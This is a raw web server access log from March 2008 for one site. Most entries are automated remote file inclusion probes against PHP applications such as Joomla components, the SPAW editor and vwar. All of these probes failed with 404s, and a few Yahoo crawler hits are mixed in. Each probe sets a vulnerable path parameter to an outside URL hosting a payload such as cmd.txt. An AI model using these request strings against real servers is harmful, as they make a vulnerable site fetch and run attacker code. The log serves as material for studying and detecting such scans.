201.76.163.42 - - [17/Mar/2008:07:34:06 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
201.76.163.42 - - [17/Mar/2008:07:34:22 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.76.163.42 - - [17/Mar/2008:07:34:22 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://nrkarts.co.uk/guestbook/es.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:07:35:53 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:07:35:53 -0700] "GET /SQuery/lib/gore.php?libpath=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:35:57 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [17/Mar/2008:07:35:59 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:07:36:07 -0700] "GET /logs/access_071220.log/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:07:36:07 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:07:36:07 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:36:31 -0700] "GET /logs/access_080129.log//becommunity/community/index.php?pageurl=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:36:31 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.130.191.252 - - [17/Mar/2008:07:36:46 -0700] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:07:37:09 -0700] "GET /logs/access_080211.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:07:37:09 -0700] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:37:19 -0700] "GET /logs/access_080207.log//becommunity/community/index.php?pageurl=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:38:20 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:38:31 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:38:31 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:38:31 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.237.64.193 - - [17/Mar/2008:07:38:51 -0700] "GET /logs/access_080119.log/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Mar/2008:07:38:51 -0700] "GET /logs/access_080119.log/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Mar/2008:07:38:51 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Mar/2008:07:38:52 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Mar/2008:07:38:52 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [17/Mar/2008:07:38:52 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
163.24.17.10 - - [17/Mar/2008:07:39:28 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:40:03 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:40:03 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:40:04 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:40:37 -0700] "GET /logs/access_080201.log/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:40:37 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:40:37 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [17/Mar/2008:07:40:54 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [17/Mar/2008:07:40:54 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:40:57 -0700] "GET /logs/access_080201.log/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:40:57 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:40:57 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:07:41:17 -0700] "GET /logs/access_080129.log/appserv_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:07:41:17 -0700] "GET /appserv_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:07:41:17 -0700] "GET /logs/appserv_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:07:41:32 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:07:42:08 -0700] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [17/Mar/2008:07:42:31 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:42:32 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:42:33 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [17/Mar/2008:07:43:19 -0700] "GET /logs/access.log/appserv_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.68.63.251 - - [17/Mar/2008:07:43:19 -0700] "GET /logs/access_080201.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.57.160 - - [17/Mar/2008:07:44:00 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.160 - - [17/Mar/2008:07:44:00 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.160 - - [17/Mar/2008:07:44:01 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:44:56 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:44:56 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:44:56 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.199 - - [17/Mar/2008:07:45:15 -0700] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.165 - - [17/Mar/2008:07:45:31 -0700] "GET /minamijewelry/?N=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:46:23 -0700] "GET /logs/access_080215.log//modules/TotalCalendar/about.php?inc_dir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:46:57 -0700] "GET /logs/access_080225.log/index.php?body=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:46:58 -0700] "GET /index.php?body=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:46:58 -0700] "GET /logs/index.php?body=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.160 - - [17/Mar/2008:07:46:59 -0700] "GET /logs/access_080201.log/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.160 - - [17/Mar/2008:07:47:00 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.160 - - [17/Mar/2008:07:47:00 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [17/Mar/2008:07:47:13 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:48:25 -0700] "GET /logs/access.log/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.173.70 - - [17/Mar/2008:07:48:28 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.173.70 - - [17/Mar/2008:07:48:29 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:48:40 -0700] "GET /logs/access.log/modules/vwar/admin/admin.php?vwar_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.48.50 - - [17/Mar/2008:07:48:53 -0700] "GET /logs/access_080225.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.48.50 - - [17/Mar/2008:07:48:53 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.84.2 - - [17/Mar/2008:07:49:17 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.173.70 - - [17/Mar/2008:07:49:40 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:07:50:28 -0700] "GET /logs/access_080117.log/index.php?body=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.175.25 - - [17/Mar/2008:07:51:29 -0700] "GET /logs/access_080225.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.25 - - [17/Mar/2008:07:51:30 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.175.25 - - [17/Mar/2008:07:51:30 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:07:51:39 -0700] "GET /logs/access_080131.log/admin/spaw/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:07:51:40 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:07:51:40 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:51:54 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:51:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:51:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.145 - - [17/Mar/2008:07:52:04 -0700] "GET /logs/access_080225.log/admin/spaw/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:52:46 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:52:46 -0700] "GET /index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:52:46 -0700] "GET /logs/index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:52:46 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:52:47 -0700] "GET /index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:52:47 -0700] "GET /logs/index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.70.82.200 - - [17/Mar/2008:07:52:55 -0700] "GET /logs/access_080124.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [17/Mar/2008:07:54:15 -0700] "GET /logs/access_080124.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:54:56 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:54:57 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.182.158 - - [17/Mar/2008:07:55:04 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.5.1 - - [17/Mar/2008:07:55:08 -0700] "GET /logs/access.log/atom.php5?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [17/Mar/2008:07:55:09 -0700] "GET /atom.php5?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [17/Mar/2008:07:55:11 -0700] "GET /logs/atom.php5?page=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:56:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.14.221.150 - - [17/Mar/2008:07:56:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:07:56:22 -0700] "GET /logs/access_080122.log//errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:07:56:22 -0700] "GET //errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.140.222.58 - - [17/Mar/2008:07:56:23 -0700] "GET /logs//errors.php?error=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [17/Mar/2008:07:56:38 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:44 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:45 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:47 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:48 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:49 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:50 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:51 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.190.76.242 - - [17/Mar/2008:07:56:52 -0700] "GET //tools/send_reminders.php?includedir=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:07:58:06 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:07:58:06 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.30.214.234 - - [17/Mar/2008:07:58:13 -0700] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.194.85.198 - - [17/Mar/2008:07:58:28 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.194.85.198 - - [17/Mar/2008:07:58:28 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
205.214.86.14 - - [17/Mar/2008:07:58:49 -0700] "GET /logs/access_080124.log/index.php?redir=http://www.punkrockslamanya.info/killweb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
